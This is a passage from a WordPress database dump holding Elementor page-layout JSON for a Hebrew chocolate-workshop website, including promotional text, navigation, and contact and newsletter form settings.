\\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"352cdf5b\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(448,107,'_elementor_version','0.4'),(452,108,'_wp_page_template','elementor_canvas'),(453,108,'_elementor_edit_mode','builder'),(454,108,'_elementor_template_type','post'),(455,108,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17359a70\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1e100444\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a7862b8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"76559f59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"57042d54\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3bf45bcb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4cc9e605\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"75f8d32a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62c4f6c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6d2d5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5a71e36\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"156941b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"352cdf5b\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc 